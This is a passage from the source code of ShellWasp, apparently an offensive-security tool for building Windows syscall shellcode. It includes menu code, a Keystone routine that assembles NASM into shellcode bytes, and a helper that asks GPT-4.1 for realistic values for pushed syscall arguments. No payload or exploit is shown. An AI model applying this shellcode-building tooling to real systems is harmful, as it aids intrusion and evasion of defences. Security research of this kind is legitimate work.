\"r\"+res+\" -\"+yel+\" Rearrange syscalls.\"+ res)\r\n\tprint (text)\r\ndef uiShowOptionsWinReleaseSelections():\r\n\ttext=\"\\n\"\r\n\ttext += \" {} \\n\".format(cya + \"c\"+res+\" -\"+yel+\" Clear current selections.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"a\"+res+\" -\"+yel+\" Add Windows releases.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"s\"+res+\" -\"+yel+\" Show current Windows releases.\"+ res)\r\n\ttext += \" {} \\n\".format(cya + \"e\"+res+\" -\"+yel+\" Edit current Windows releases.\"+ res)\r\n\tprint (text)\r\n\r\n\r\ndef giveInputWinReleases():\r\n\tuiShowWinReleases()\r\n\tuiShowOptionsWinReleaseSelections()\r\n\twhile True:\r\n\t\tprint(yel+ \" ShellWasp>\" + cya + \"WinReleases> \"+ res, end=\"\")\r\n\t\ttechIN = input()\r\n\t\tif(techIN[0:1] == \"x\"):\r\n\t\t\t# print(\"Returning to find shellcode instructions menu.\\n\")\r\n\t\t\tbreak\r\n\t\telif(techIN[0:1] == \"a\"):\r\n\t\t\tuiAddWinReleases()\r\n\t\t\t# print(\"Returning to tech settings submenu.\\n\")\r\n\t\telif(techIN[0:1] == \"c\"):\r\n\t\t\tsh.osChoices2.clear()\r\n\r\n\t\t\tprint (\"\\tList of Windows releases cleared.\\n\")\r\n\t\t\t# print(\"Returning to tech settings submenu.\\n\")\r\n\t\telif(techIN[0:1] == \"s\"):\r\n\t\t\tuiShowWinReleases()\r\n\t\t\t# print(\"Returning to tech settings submenu.\\n\")\r\n\t\telif(techIN[0:1] == \"e\"):\r\n\t\t\tuiEditWinReleases()\r\n\t\telif(techIN[0:1] == \"h\"):\r\n\t\t\tuiShowOptionsWinReleaseSelections()\r\n\t\telse:\r\n\t\t\tprint(\"Invalid input\")\r\n\r\ndef giveInput():\r\n\tuiShowSyscalls()\r\n\tuiShowOptionsSyscallSelections()\t\r\n\twhile True:\r\n\t\tprint(yel+ \" ShellWasp>\" + cya + \"Syscalls> \"+ res, end=\"\")\r\n\t\ttechIN = input()\r\n\t\tif(techIN[0:1] == \"x\"):\r\n\t\t\t# print(\"Returning to find shellcode instructions menu.\\n\")\r\n\t\t\tbreak\r\n\t\telif(techIN[0:1] == \"a\"):\r\n\t\t\tuiAddSyscalls()\r\n\t\t\t# print(\"Returning to tech settings submenu.\\n\")\r\n\t\telif(techIN[0:1] == \"c\"):\r\n\t\t\tsh.list_of_syscalls.clear()\r\n\t\t\tprint (\"\\tSyscalls cleared.\\n\")\r\n\t\t\t# print(\"Returning to tech settings submenu.\\n\")\r\n\t\telif(techIN[0:1] == \"s\"):\r\n\t\t\tuiShowSyscalls()\r\n\t\t\t# print(\"Returning to tech settings submenu.\\n\")\r\n\t\telif(techIN[0:1] == \"e\"):\r\n\t\t\tuiEditSyscalls()\r\n\t\telif(techIN[0:1] == \"r\"):\r\n\t\t\tuiRearrangeSyscalls()\r\n\t\telif(techIN[0:1] == \"h\"):\r\n\t\t\tuiShowOptionsSyscallSelections()\r\n\t\telse:\r\n\t\t\tprint(\"Invalid input\")\r\n\r\ndef generateBytes(shellInput):\r\n\tks = Ks(KS_ARCH_X86, KS_MODE_32)\r\n\tks.syntax= KS_OPT_SYNTAX_NASM\r\n\r\n\tsRaw.shellcode, sRaw.count = ks.asm(shellInput)\r\n\tsRaw.bytesShellcode=bytes(sRaw.shellcode)\r\n\tsRaw.bytesShellcode=cya+sRaw.bytesShellcode.hex()+res\r\n\r\n\tsRaw.shellCodeStrLit = 'x' + str(hexlify(bytearray(sRaw.shellcode),'x',1))[2:-1]\r\n\tsRaw.shellCodeStrLit = '\"' + sRaw.shellCodeStrLit.replace('x','\\\\x') + '\"'\r\n\tsRaw.shellCodeStrLit = blu+ sRaw.shellCodeStrLit+res\r\ndef ui():\r\n\tsplash()\r\n\tshowOptions()\r\n\tuiShowOptionsMainMenu()\r\n\tglobal sampleVals,integrateAI\r\n\tx = \"\"\r\n\r\n\twhile x != \"e\":\t\t#Loops on keyboard input\r\n\t\ttry:\t\t\t#Will break the loop on entering x\r\n\t\t\tprint(yel + \" ShellWasp> \" + res, end=\"\")\r\n\t\t\tuserIN = input()\r\n\t\t\tprint(res)\r\n\t\t\tif userIN[0:1] == \"x\":\r\n\t\t\t\tprint(\"\\nExiting program.\\n\")\r\n\t\t\t\tbreak\r\n\t\t\t\r\n\t\t\telif userIN[0:1] == \"i\":\r\n\t\t\t\tgiveInput()\r\n\t\t\telif userIN[0:1] == \"s\":\r\n\t\t\t\tuiSyscallStyle()\r\n\t\t\telif userIN[0:1] == \"b\":\r\n\t\t\t\tintegrateAI=False\r\n\t\t\t\tsampleVals=False\r\n\t\t\t\tout=buildSyscall()\r\n\t\t\t\tprint(out)\r\n\t\t\telif userIN[0:1] == \"B\":\r\n\t\t\t\tsampleVals=True\r\n\t\t\t\tintegrateAI=False\r\n\t\t\t\tout=buildSyscall()\r\n\t\t\t\tprint(out)\r\n\t\t\telif userIN[0:1] == \"A\":\r\n\t\t\t\tif OPENAI_API_KEY==\"putYourKeyHere\":\r\n\t\t\t\t\tprint (red,\" You must obtain and enter your\"+whi+\" OPENAI_API_KEY\"+red+\" and place it in \"+whi+\"myKeys.py\"+red+\".\",res)\r\n\t\t\t\t\tbreak\r\n\t\t\t\tintegrateAI=True\r\n\t\t\t\tsampleVals=False\r\n\t\t\t\tout=buildSyscall()\r\n\t\t\t\tprint(out)\r\n\t\t\telif userIN[0:1] == \"p\":\t\r\n\t\t\t\tbuildSyscall(True)\r\n\t\t\telif userIN[0:1] == \"w\":\r\n\t\t\t\tgiveInputWinReleases()\r\n\t\t\telif(re.match(\"^b$\", userIN)):\r\n\t\t\t\tpass\r\n\t\t\telif userIN[0:1] == \"U\" or userIN[0:1] == \"u\": \r\n\t\t\t\tpass\r\n\t\t\telif userIN[0:1] == \"a\":\t# \"change architecture, 32-bit or 64-bit\"\r\n\t\t\t\t# print(\"\\nReturning to main menu.\\n\")\r\n\t\t\t\tpass\r\n\t\t\telif(re.match(\"^c$\", userIN)): # \"save configuration\"\r\n\t\t\t\tcon = Configuration(conFile)\r\n\r\n\t\t\t\t# print(\"trying to save!\")\r\n\t\t\t\tmodConf()\r\n\t\t\t\tsaveConf(con)\r\n\t\t\telif userIN[0:1] == \"h\":\r\n\t\t\t\tuiShowOptionsMainMenu()\r\n\r\n\t\t\telse:\r\n\t\t\t\tprint(\"\\nInvalid input.\\n\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tprint (e)\r\n\t\t\tprint(traceback.format_exc())\r\n\t\t\tprint (\"exception\")\r\n\r\ndef syscallMain():\r\n\treadConf()\r\n\t# out=buildSyscall(True)\r\n\t# print(out)\r\n\tui()\r\nsConf=configOpt()\r\nsh = shellcode()\r\nbuilds=winReleases()\r\nsyscalls=winSyscalls()\r\nsRaw=shellBytes()" }, { "path": "start/singleton/__init__.py", "content": "from .helpers import Singleton\r\n\r\n__all__ = [\"Singleton\"]" }, { "path": "start/singleton/helpers.py", "content": "from abc import ABCMeta\r\nfrom typing import Any\r\n\r\n\r\nclass Singleton(ABCMeta):\r\n \"\"\"\r\n \r\n This class is a standard implementation of the Single Pattern\r\n (Note: Has not been tested for Thread Saftey)\r\n\r\n \"\"\"\r\n\r\n _instances = {}\r\n\r\n def __call__(cls, *args, **kwargs) -> Any:\r\n if cls not in cls._instances:\r\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\r\n return cls._instances[cls]" }, { "path": "start/syscallAIHelper.py", "content": "from pathlib import Path\r\nfrom datetime import datetime\r\nfrom contextlib import redirect_stdout\r\nimport io\r\nimport os\r\nimport json\r\nimport time\r\nimport copy\r\n\r\nfrom openai import OpenAI\r\nfrom openai import BadRequestError, APIConnectionError, APITimeoutError, RateLimitError, InternalServerError\r\n\r\nfrom .myKeys import OPENAI_API_KEY\r\nfrom .syscallAiPrompts import PROMPT_PREFIX, schema\r\n\r\n\r\nSAVE_STEM = \"calls\"\r\nCURRENT_JSON_NAME = f\"{SAVE_STEM}_current.json\"\r\nRESUME_CURRENT = False\r\nAUTO_SAVE_CURRENT = True\r\nSHOW_STRUCTURE_FIELDS_IN_TEXT = True\r\n\r\nMODEL = \"gpt-4.1\"\r\n\r\nDEBUG_OUTPUT = False\r\nJSON_SUBDIR_NAME = \"json\"\r\n\r\n\r\nMODEL_PRICING = {\r\n\t\"gpt-4.1\": {\r\n\t\t\"input_per_million\": 2.0,\r\n\t\t\"output_per_million\": 8.0\r\n\t},\r\n\t\"gpt-4o\": {\r\n\t\t\"input_per_million\": 2.5,\r\n\t\t\"output_per_million\": 10.0\r\n\t}\r\n}\r\n\r\n\r\nrunStats = {\r\n\t\"numCalls\": 0,\r\n\t\"promptTokens\": 0,\r\n\t\"completionTokens\": 0,\r\n\t\"totalTokens\": 0,\r\n\t\"estimatedCost\": 0.0\r\n}\r\n\r\n\r\ndef dprint(*args, **kwargs):\r\n\tif DEBUG_OUTPUT:\r\n\t\tprint(*args, **kwargs)\r\n\r\n\r\ndef resetRunStats():\r\n\trunStats[\"numCalls\"] = 0\r\n\trunStats[\"promptTokens\"] = 0\r\n\trunStats[\"completionTokens\"] = 0\r\n\trunStats[\"totalTokens\"] = 0\r\n\trunStats[\"estimatedCost\"] = 0.0\r\n\r\n\r\ndef estimateCostFromCounts(modelName: str, promptTokens: int, completionTokens: int) -> float:\r\n\tpricing = MODEL_PRICING[modelName]\r\n\tinputCost = (promptTokens / 1_000_000) * pricing[\"input_per_million\"]\r\n\toutputCost = (completionTokens / 1_000_000) * pricing[\"output_per_million\"]\r\n\treturn inputCost + outputCost\r\n\r\n\r\ndef addUsageToRunStats(modelName: str, usageObj) -> float:\r\n\tcallCost = estimateCostFromCounts(\r\n\t\tmodelName,\r\n\t\tusageObj.prompt_tokens,\r\n\t\tusageObj.completion_tokens\r\n\t)\r\n\r\n\trunStats[\"numCalls\"] += 1\r\n\trunStats[\"promptTokens\"] += usageObj.prompt_tokens\r\n\trunStats[\"completionTokens\"] += usageObj.completion_tokens\r\n\trunStats[\"totalTokens\"] += usageObj.total_tokens\r\n\trunStats[\"estimatedCost\"] += callCost\r\n\r\n\treturn callCost\r\n\r\n\r\ndef printRunStats():\r\n\tdprint(\"\\n--- Running Totals ---\")\r\n\tdprint(\"OpenAI calls:\", runStats[\"numCalls\"])\r\n\tdprint(\"Prompt tokens:\", runStats[\"promptTokens\"])\r\n\tdprint(\"Completion tokens:\", runStats[\"completionTokens\"])\r\n\tdprint(\"Total tokens:\", runStats[\"totalTokens\"])\r\n\tdprint(f\"Estimated total cost: ${runStats['estimatedCost']:.6f}\")\r\n\r\n\r\ndef makeEmptyAggregate():\r\n\treturn {\r\n\t\t\"calls\": [],\r\n\t\t\"structures\": {}\r\n\t}\r\n\r\n\r\ndef getWorkingDir():\r\n\treturn Path.cwd()\r\n\r\n\r\ndef getJsonDir(baseDir=None):\r\n\tif baseDir is None:\r\n\t\tbaseDir = getWorkingDir()\r\n\r\n\tbaseDir = Path(baseDir)\r\n\tjsonDir = baseDir / JSON_SUBDIR_NAME\r\n\tjsonDir.mkdir(parents=True, exist_ok=True)\r\n\treturn jsonDir\r\n\r\n\r\ndef getTimestamp():\r\n\treturn datetime.now().strftime(\"%Y%m%d_%H%M%S\")\r\n\r\n\r\ndef sanitizeFilenamePiece(text: str) -> str:\r\n\tif not text:\r\n\t\treturn \"noCalls\"\r\n\r\n\tsafeChars = []\r\n\tfor ch in str(text):\r\n\t\tif ch.isalnum() or ch in (\"-\", \"_\"):\r\n\t\t\tsafeChars.append(ch)\r\n\t\telse:\r\n\t\t\tsafeChars.append(\"_\")\r\n\r\n\tcleaned = \"\".join(safeChars).strip(\"_\")\r\n\treturn cleaned or \"noCalls\"\r\n\r\n\r\ndef getFirstFuncName(result: dict) -> str:\r\n\tcalls = result.get(\"calls\", [])\r\n\tif not calls:\r\n\t\treturn \"noCalls\"\r\n\r\n\tfirstName = calls[0].get(\"ntFunc\", \"noCalls\")\r\n\treturn sanitizeFilenamePiece(firstName)\r\n\r\n\r\ndef writeTextAtomic(path: Path, text: str):\r\n\ttempPath = path.with_suffix(path.suffix + \".tmp\")\r\n\ttempPath.write_text(text, encoding=\"utf-8\")\r\n\ttempPath.replace(path)\r\n\r\n\r\ndef saveJsonFile(path: Path, data: dict):\r\n\tjsonText = json.dumps(data, indent=2)\r\n\twriteTextAtomic(path, jsonText)\r\n\r\n\r\ndef loadJsonFile(path: Path):\r\n\tif not path.exists():\r\n\t\treturn None\r\n\r\n\traw = path.read_text(encoding=\"utf-8\")\r\n\r\n\tif not raw or not raw.strip():\r\n\t\tdprint(f\"Warning: JSON file is empty: {path}\")\r\n\t\treturn None\r\n\r\n\ttry:\r\n\t\treturn json.loads(raw)\r\n\texcept json.JSONDecodeError as e:\r\n\t\tdprint(f\"Warning: invalid JSON in {path}: {e}\")\r\n\t\treturn None\r\n\r\ndef convertChunkStructuresToDict(result: dict) -> dict:\r\n\tif not isinstance(result, dict):\r\n\t\treturn {\r\n\t\t\t\"calls\": [],\r\n\t\t\t\"structures\": {}\r\n\t\t}\r\n\r\n\tcalls = result.get(\"calls\", [])\r\n\tif not isinstance(calls, list):\r\n\t\tcalls = []\r\n\r\n\tstructures = result.get(\"structures\", {})\r\n\tstructuresDict = {}\r\n\r\n\t# Canonical format: dict already\r\n\tif isinstance(structures, dict):\r\n\t\tfor structId, structDef in structures.items():\r\n\t\t\tif isinstance(structDef, dict):\r\n\t\t\t\tstructuresDict[structId] = {\r\n\t\t\t\t\t\"type\": structDef.get(\"type\", \"\"),\r\n\t\t\t\t\t\"fields\": structDef.get(\"fields\", [])\r\n\t\t\t\t}\r\n\r\n\t# Legacy compatibility only: list with embedded \"id\"\r\n\telif isinstance(structures, list):\r\n\t\tfor structEntry in structures:\r\n\t\t\tif not isinstance(structEntry, dict):\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tstructId = structEntry.get(\"id\")\r\n\t\t\tif not structId:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tstructuresDict[structId] = {\r\n\t\t\t\t\"type\": structEntry.get(\"type\", \"\"),\r\n\t\t\t\t\"fields\": structEntry.get(\"fields\", [])\r\n\t\t\t}\r\n\r\n\treturn {\r\n\t\t\"calls\": calls,\r\n\t\t\"structures\": structuresDict\r\n\t}\r\n\r\n\r\ndef normalizeAggregate(data):\r\n\tif not isinstance(data, dict):\r\n\t\treturn makeEmptyAggregate()\r\n\r\n\tif \"calls\" not in data or not isinstance(data[\"calls\"], list):\r\n\t\tdata[\"calls\"] = []\r\n\r\n\tif \"structures\" not in data or not isinstance(data[\"structures\"], dict):\r\n\t\tdata[\"structures\"] = {}\r\n\r\n\treturn data\r\n\r\n\r\ndef loadCurrentAggregate(jsonDir: Path):\r\n\tcurrentPath = jsonDir / CURRENT_JSON_NAME\r\n\tloaded = loadJsonFile(currentPath)\r\n\r\n\tif loaded is None:\r\n\t\treturn makeEmptyAggregate()\r\n\r\n\treturn normalizeAggregate(loaded)\r\n\r\n\r\ndef saveCurrentAggregate(aggregate: dict, jsonDir: Path):\r\n\tcurrentPath = jsonDir / CURRENT_JSON_NAME\r\n\tsaveJsonFile(currentPath, aggregate)\r\n\treturn currentPath\r\n\r\n\r\ndef renderCallsNicerText(result, showStructureFields=True):\r\n\tbuffer = io.StringIO()\r\n\twith redirect_stdout(buffer):\r\n\t\tformatCallsNicer(result, showStructureFields=showStructureFields)\r\n\treturn buffer.getvalue()\r\n\r\n\r\ndef getNextStructNum(structureDict: dict) -> int:\r\n\tmaxNum = 0\r\n\r\n\tfor structId in structureDict.keys():\r\n\t\tif not isinstance(structId, str):\r\n\t\t\tcontinue\r\n\r\n\t\tif not structId.startswith(\"struct\"):\r\n\t\t\tcontinue\r\n\r\n\t\tsuffix = structId[len(\"struct\"):]\r\n\t\tif suffix.isdigit():\r\n\t\t\tmaxNum = max(maxNum, int(suffix))\r\n\r\n\treturn maxNum + 1\r\n\r\n\r\ndef saveResultsBundle(result, baseDir=None, saveStem=SAVE_STEM, showStructureFields=True):\r\n\t\"\"\"\r\n\tManual save function.\r\n\tSaves:\r\n\t- dated JSON snapshot into ./json\r\n\t- current working JSON into ./json\r\n\t- dated text rendering using formatCallsNicer() into ./json\r\n\t\"\"\"\r\n\tif baseDir is None:\r\n\t\tbaseDir = getWorkingDir()\r\n\r\n\tjsonDir = getJsonDir(baseDir)\r\n\ttimestamp = getTimestamp()\r\n\tfirstFunc = getFirstFuncName(result)\r\n\r\n\tdatedJsonPath = jsonDir / f\"{saveStem}_{firstFunc}_{timestamp}.json\"\r\n\tcurrentJsonPath = jsonDir / CURRENT_JSON_NAME\r\n\tdatedTextPath = jsonDir / f\"{saveStem}_{firstFunc}_{timestamp}.txt\"\r\n\r\n\tsaveJsonFile(datedJsonPath, result)\r\n\tsaveJsonFile(currentJsonPath, result)\r\n\r\n\tprettyText = renderCallsNicerText(\r\n\t\tresult,\r\n\t\tshowStructureFields=showStructureFields\r\n\t)\r\n\twriteTextAtomic(datedTextPath, prettyText)\r\n\r\n\tdprint(\"\\n--- Saved Files ---\")\r\n\tdprint(\"Dated JSON:\", datedJsonPath)\r\n\tdprint(\"Current JSON:\", currentJsonPath)\r\n\tdprint(\"Dated text:\", datedTextPath)\r\n\r\n\treturn {\r\n\t\t\"datedJson\": datedJsonPath,\r\n\t\t\"currentJson\": currentJsonPath,\r\n\t\t\"datedText\": datedTextPath\r\n\t}\r\n\r\n\r\ndef mergeChunkResult(aggregate: dict, chunkResult: dict, chunkIndex: int) -> dict:\r\n\t\"\"\"\r\n\tMerge one chunk result into the aggregate JSON.\r\n\r\n\tBehavior:\r\n\t- preserves call order by appending\r\n\t- stores structures in a top-level dictionary keyed by struct ID\r\n\t- remaps structure IDs so there are no collisions across chunks\r\n\t- updates each push's structureRef accordingly\r\n\t- does NOT deduplicate anything\r\n\t\"\"\"\r\n\r\n\taggregate = normalizeAggregate(aggregate)\r\n\tchunkResult = normalizeAggregate(copy.deepcopy(chunkResult))\r\n\r\n\tstructureIdMap = {}\r\n\tnextStructNum = getNextStructNum(aggregate[\"structures\"])\r\n\r\n\tfor oldId, structEntry in chunkResult[\"structures\"].items():\r\n\t\tnewId = f\"struct{nextStructNum}\"\r\n\t\tnextStructNum += 1\r\n\r\n\t\tstructureIdMap[oldId] = newId\r\n\t\taggregate[\"structures\"][newId] = copy.deepcopy(structEntry)\r\n\r\n\tfor callEntry in chunkResult[\"calls\"]:\r\n\t\tnewCallEntry = copy.deepcopy(callEntry)\r\n\r\n\t\tfor pushEntry in newCallEntry.get(\"pushes\", []):\r\n\t\t\toldRef = pushEntry.get(\"structureRef\")\r\n\t\t\tif oldRef:\r\n\t\t\t\tpushEntry[\"structureRef\"] = structureIdMap.get(oldRef, oldRef)\r\n\r\n\t\taggregate[\"calls\"].append(newCallEntry)\r\n\r\n\treturn aggregate\r\n\r\n\r\ndef formatField(field, nameWidth=24, typeWidth=20):\r\n\tfieldName = field.get(\"fieldName\", \"\")\r\n\tfieldType = field.get(\"fieldType\", \"\")\r\n\tfieldValue = field.get(\"fieldValue\", \"\")\r\n\tfieldComment = field.get(\"fieldComment\") or \"\"\r\n\r\n\tline = f\"\\t\\t{fieldName:<{nameWidth}} {fieldType:<{typeWidth}} = {fieldValue}\"\r\n\tif fieldComment:\r\n\t\tline += f\" ; {fieldComment}\"\r\n\treturn line\r\n\r\n\r\ndef formatStructure(structId, structDef):\r\n\tif not structDef:\r\n\t\treturn\r\n\r\n\tstructType = structDef.get(\"type\", \"\")\r\n\tfields = structDef.get(\"fields\", [])\r\n\r\n\tprint(f\"\\tstructure definition: {structType} ({structId})\")\r\n\tif not fields:\r\n\t\tprint(\"\\t\\t\")\r\n\t\treturn\r\n\r\n\tfor field in fields:\r\n\t\tprint(formatField(field))\r\n\r\n\r\ndef formatPushEntry(entry, structureMap=None, commentColumn=24, showStructureFields=True):\r\n\tvalue = entry.get(\"value\", \"\")\r\n\tcomment = entry.get(\"additionalComment\") or \"\"\r\n\tstructurePointer = entry.get(\"structurePointer\")\r\n\tstructureRef = entry.get(\"structureRef\")\r\n\tstructureValueExpectations = entry.get(\"structureValueExpectations\")\r\n\tpointedValue = entry.get(\"pointedValue\")\r\n\r\n\tline = f\"push {value}\"\r\n\tif comment:\r\n\t\tpadding = max(1, commentColumn - len(value))\r\n\t\tline += (\" \" * padding) + f\"; {comment}\"\r\n\tprint(line)\r\n\r\n\tif pointedValue:\r\n\t\tprint(f\"\\tpointed value: {pointedValue}\")\r\n\r\n\tif structurePointer:\r\n\t\tif structureRef:\r\n\t\t\tprint(f\"\\tstructure: {structurePointer} ({structureRef})\")\r\n\t\telse:\r\n\t\t\tprint(f\"\\tstructure: {structurePointer}\")\r\n\r\n\tif structureValueExpectations:\r\n\t\tprint(f\"\\texpected fields: {structureValueExpectations}\")\r\n\r\n\tif structureRef and structureMap:\r\n\t\tstructDef = structureMap.get(structureRef)\r\n\t\tif structDef and showStructureFields:\r\n\t\t\tformatStructure(structureRef, structDef)\r\n\t\telif showStructureFields:\r\n\t\t\tprint(f\"\\tstructure definition: \")\r\n\r\n\tprint()\r\n\r\n\r\ndef formatPushes(pushes, structureMap=None, commentColumn=24, showStructureFields=True):\r\n\tfor entry in pushes:\r\n\t\tformatPushEntry(\r\n\t\t\tentry,\r\n\t\t\tstructureMap=structureMap,\r\n\t\t\tcommentColumn=commentColumn,\r\n\t\t\tshowStructureFields=showStructureFields\r\n\t\t)\r\n\r\n\r\ndef formatPushesNicer(pushes, structureMap=None, showStructureFields=True):\r\n\tformatPushes(\r\n\t\tpushes,\r\n\t\tstructureMap=structureMap,\r\n\t\tcommentColumn=24,\r\n\t\tshowStructureFields=showStructureFields\r\n\t)\r\n\r\n\r\ndef formatCalls(result, showStructureFields=True):\r\n\tcalls = result.get(\"calls\", [])\r\n\tstructureMap = result.get(\"structures\", {})\r\n\r\n\tfor idx, call in enumerate(calls, start=1):\r\n\t\tntFunc = call.get(\"ntFunc\", \"\")\r\n\t\tpushes = call.get(\"pushes\", [])\r\n\r\n\t\tprint(f\"=== Call {idx}: {ntFunc} ===\")\r\n\t\tformatPushes(\r\n\t\t\tpushes,\r\n\t\t\tstructureMap=structureMap,\r\n\t\t\tcommentColumn=24,\r\n\t\t\tshowStructureFields=showStructureFields\r\n\t\t)\r\n\r\n\r\ndef formatCallsNicer(result, showStructureFields=True):\r\n\tformatCalls(result, showStructureFields=showStructureFields)\r\n\r\n\r\ndef runPrompt(myPrompt: str):\r\n\tclient = OpenAI(api_key=OPENAI_API_KEY)\r\n\r\n\tresponse = client.chat.completions.create(\r\n\t\tmodel=MODEL,\r\n\t\tmessages=[{\"role\": \"user\", \"content\": myPrompt}],\r\n\t\tresponse_format={\r\n\t\t\t\"type\": \"json_schema\",\r\n\t\t\t\"json_schema\": schema\r\n\t\t},\r\n\t\ttemperature=0\r\n\t)\r\n\r\n\traw = response.choices[0].message.content\r\n\tusage = response.usage\r\n\r\n\tcallCost = addUsageToRunStats(MODEL, usage)\r\n\r\n\tdprint(\"\\n--- Token Usage For This Call ---\")\r\n\tdprint(\"Prompt tokens:\", usage.prompt_tokens)\r\n\tdprint(\"Completion tokens:\", usage.completion_tokens)\r\n\tdprint(\"Total tokens:\", usage.total_tokens)\r\n\tdprint(f\"Estimated cost for this call: ${callCost:.6f}\")\r\n\r\n\tparsed = json.loads(raw)\r\n\r\n\t# json.loads() already converts JSON null -> Python None in memory.\r\n\t# This additionally converts structures from list form into dict form in memory.\r\n\tparsed = convertChunkStructuresToDict(parsed)\r\n\treturn parsed\r\n\r\n\r\ndef runPromptWithRetry(myPrompt: str, maxRetries=5, baseDelay=3):\r\n\tattempt = 0\r\n\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\treturn runPrompt(myPrompt)\r\n\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\traise\r\n\r\n\t\texcept BadRequestError:\r\n\t\t\traise\r\n\r\n\t\texcept (APIConnectionError, APITimeoutError, RateLimitError, InternalServerError) as e:\r\n\t\t\tattempt += 1\r\n\t\t\tif attempt > maxRetries:\r\n\t\t\t\tdprint(f\"Giving up after {maxRetries} retries: {e}\")\r\n\t\t\t\traise\r\n\r\n\t\t\tdelay = baseDelay * (2 ** (attempt - 1))\r\n\t\t\tdprint(f\"Retryable OpenAI error on attempt {attempt}/{maxRetries}: {e}\")\r\n\t\t\tdprint(f\"Sleeping {delay} seconds before retry...\")\r\n\t\t\ttime.sleep(delay)\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tattempt += 1\r\n\t\t\tif attempt > maxRetries:\r\n\t\t\t\tdprint(f\"Giving up after {maxRetries} retries: {e}\")\r\n\t\t\t\traise\r\n\r\n\t\t\tdelay = baseDelay * (2 ** (attempt - 1))\r\n\t\t\tdprint(f\"Unexpected error on attempt {attempt}/{maxRetries}: {e}\")\r\n\t\t\tdprint(f\"Sleeping {delay} seconds before retry...\")\r\n\t\t\ttime.sleep(delay)\r\n\r\n\r\ndef chunkList(items, chunkSize):\r\n\tfor i in range(0, len(items), chunkSize):\r\n\t\tyield items[i:i + chunkSize]\r\n\r\n\r\ndef buildChunkPrompt(promptPrefix: str, apiChunk: list[str]) -> str:\r\n\treturn promptPrefix.rstrip() + \"\\n\\n\" + \"\\n\\n\".join(apiChunk)\r\n\r\n\r\ndef processApiBlocksInChunks(\r\n\tapiBlocks: list[str],\r\n\tchunkSize: int,\r\n\tpromptPrefix: str = PROMPT_PREFIX,\r\n\tresumeCurrent: bool = RESUME_CURRENT,\r\n\tautoSaveCurrent: bool = AUTO_SAVE_CURRENT,\r\n\tbaseDir=None,\r\n\tdebugOutput: bool = DEBUG_OUTPUT\r\n):\r\n\tglobal DEBUG_OUTPUT\r\n\tDEBUG_OUTPUT = debugOutput\r\n\r\n\tif baseDir is None:\r\n\t\tbaseDir = getWorkingDir()\r\n\r\n\tbaseDir = Path(baseDir)\r\n\tbaseDir.mkdir(parents=True, exist_ok=True)\r\n\tjsonDir = getJsonDir(baseDir)\r\n\r\n\tif resumeCurrent:\r\n\t\taggregate = loadCurrentAggregate(jsonDir)\r\n\t\tdprint(f\"\\n--- Resuming from existing current JSON: {jsonDir / CURRENT_JSON_NAME} ---\\n\")\r\n\telse:\r\n\t\taggregate = makeEmptyAggregate()\r\n\t\tdprint(f\"\\n--- Starting fresh; current JSON will be overwritten: {jsonDir / CURRENT_JSON_NAME} ---\\n\")\r\n\t\tif autoSaveCurrent:\r\n\t\t\tsaveCurrentAggregate(aggregate, jsonDir)\r\n\r\n\tfor chunkIndex, apiChunk in enumerate(chunkList(apiBlocks, chunkSize), start=1):\r\n\t\tchunkPrompt = buildChunkPrompt(promptPrefix, apiChunk)\r\n\r\n\t\tdprint(f\"\\n=== Processing chunk {chunkIndex} with {len(apiChunk)} API block(s) ===\\n\")\r\n\r\n\t\tchunkResult = runPromptWithRetry(chunkPrompt)\r\n\r\n\t\taggregate = mergeChunkResult(\r\n\t\t\taggregate=aggregate,\r\n\t\t\tchunkResult=chunkResult,\r\n\t\t\tchunkIndex=chunkIndex\r\n\t\t)\r\n\r\n\t\tif autoSaveCurrent:\r\n\t\t\tcurrentPath = saveCurrentAggregate(aggregate, jsonDir)\r\n\t\t\tdprint(f\"Updated current JSON: {currentPath}\")\r\n\r\n\treturn aggregate\r\n\r\n\r\ndef buildPossibleValues(\r\n\tapiBlocks: list[str],\r\n\tchunkSize: int = 1,\r\n\tresumeCurrent: bool = RESUME_CURRENT,\r\n\tautoSaveCurrent: bool = AUTO_SAVE_CURRENT,\r\n\tbaseDir=None,\r\n\tdebugOutput: bool = DEBUG_OUTPUT\r\n):\r\n\tresetRunStats()\r\n\r\n\tresult = processApiBlocksInChunks(\r\n\t\tapiBlocks=apiBlocks,\r\n\t\tchunkSize=chunkSize,\r\n\t\tpromptPrefix=PROMPT_PREFIX,\r\n\t\tresumeCurrent=resumeCurrent,\r\n\t\tautoSaveCurrent=autoSaveCurrent,\r\n\t\tbaseDir=baseDir,\r\n\t\tdebugOutput=debugOutput\r\n\t)\r\n\r\n\treturn result\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# \t# from printApiBlocks import api_blocks\r\n\r\n# \t# result = buildPossibleValues(\r\n# \t# \tapiBlocks=api_blocks,\r\n# \t# \tchunkSize=1,\r\n# \t# \tresumeCurrent=False,\r\n# \t# \tautoSaveCurrent=True,\r\n# \t# \tbaseDir=Path.cwd(),\r\n# \t# \tdebugOutput=True\r\n# \t# )\r\n\r\n# \tdprint(\"\\n--- Pretty JSON (entire result) ---\\n\")\r\n# \tdprint(json.dumps(result, indent=2))\r\n\r\n# \tdprint(\"\\n--- Pretty JSON (calls only) ---\\n\")\r\n# \tdprint(json.dumps(result[\"calls\"], indent=2))\r\n\r\n# \tdprint(\"\\n--- Assembly Style ---\\n\")\r\n# \tif DEBUG_OUTPUT:\r\n# \t\tformatCalls(result)\r\n\r\n# \tdprint(\"\\n--- Assembly Style 2 ---\\n\")\r\n# \tif DEBUG_OUTPUT:\r\n# \t\tformatCallsNicer(result)\r\n\r\n# \tprintRunStats()\r\n\r\n# \tsaveResultsBundle(\r\n# \t\tresult,\r\n# \t\tbaseDir=Path.cwd(),\r\n# \t\tsaveStem=SAVE_STEM,\r\n# \t\tshowStructureFields=SHOW_STRUCTURE_FIELDS_IN_TEXT\r\n# \t)" }, { "path": "start/syscallAiPrompts.py", "content": "PROMPT_PREFIX = \"\"\" \r\nReturn structured JSON with highly realistic sample values.\r\nYou are given Windows assembly push instructions where every pushed operand is an immediate literal.\r\n\r\nReturn a JSON object with exactly these top-level fields:\r\n\r\n- calls\r\n - An array of function-call 